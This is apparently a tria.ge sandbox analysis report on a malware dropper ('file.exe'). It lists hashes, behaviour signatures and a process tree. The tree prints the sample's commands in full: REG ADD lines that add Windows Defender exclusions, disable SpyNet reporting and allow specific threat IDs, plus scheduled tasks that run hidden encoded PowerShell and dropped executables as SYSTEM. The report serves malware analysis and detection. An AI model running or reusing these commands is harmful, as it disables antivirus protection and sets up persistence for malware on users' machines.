Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    91s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/01/2023, 23:09

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    34aa9d2f6926936f6640dd2b2fe67b52

  • SHA1

    ceb509df12c4bf2ba25276978933805e965fe66a

  • SHA256

    8f1aa57b09f9759ad64716729e7119db2fefa3b9cd58d5b5763db6adf52a07fb

  • SHA512

    552fbe8bc8fe81d7b17fe2435dc694cf99084335c95ba667e4a7f523aa079ee507db807b3d0eeff33b6b152f5b60284f58d43c831e5e674928b65ed93a9638c4

  • SSDEEP

    196608:91OqEzkj3ACoSYjCy3oB+fvDiPiANwEhF2ZuEm6d0L/4its7C:3OqEgzAC3YjCy386e6AZF2Ye074K

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4348
    • C:\Users\Admin\AppData\Local\Temp\7zS691F.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Users\Admin\AppData\Local\Temp\7zS6BDE.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4368
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2776
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:2700
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4920
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2044
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1088
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:2636
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gILBLQJPy" /SC once /ST 00:04:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4796
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gILBLQJPy"
                  4⤵
                    PID:2472
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gILBLQJPy"
                    4⤵
                      PID:4596
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bKSdXYcbPqaDVLVkuf" /SC once /ST 00:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV\ctDSWOtFdFHnGxP\bUcxDtF.exe\" 5H /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:4304
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1236
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:240
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2256
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:404
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2016
                      • C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV\ctDSWOtFdFHnGxP\bUcxDtF.exe
                        C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV\ctDSWOtFdFHnGxP\bUcxDtF.exe 5H /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:2916
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2184
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4236
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:1736
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:1548
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:2760
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4620
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1908
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:2044
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2660
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2768
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:312
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4940
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:4916
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4552
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:2200
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2632
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:5104
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3084
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:5116
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3688
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1448
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:1016
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:3708
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4308
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:2572
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:2508
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HVWbrjwkJiSqvkavYJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HVWbrjwkJiSqvkavYJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LmmszUEJzBYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LmmszUEJzBYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OibSIJsEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OibSIJsEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\adNRHlblCRCVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\adNRHlblCRCVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZWspyXeKBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZWspyXeKBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JOVRmxpCUcaHCgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JOVRmxpCUcaHCgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LoheFfIruNsPDWeP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LoheFfIruNsPDWeP\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1840
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HVWbrjwkJiSqvkavYJR" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:4928
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HVWbrjwkJiSqvkavYJR" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:1568
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HVWbrjwkJiSqvkavYJR" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:4416
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmmszUEJzBYU2" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:1392
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmmszUEJzBYU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:4868
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OibSIJsEU" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:644
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OibSIJsEU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:2208
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\adNRHlblCRCVC" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2532
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\adNRHlblCRCVC" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:612
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZWspyXeKBUn" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2356
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZWspyXeKBUn" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:240
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JOVRmxpCUcaHCgVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:4700
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JOVRmxpCUcaHCgVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4356
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:384
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xAyBNxeuaWhtECIkV /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3276
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LoheFfIruNsPDWeP /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5080
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LoheFfIruNsPDWeP /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2968
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gZIALhQCM" /SC once /ST 00:07:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:1440
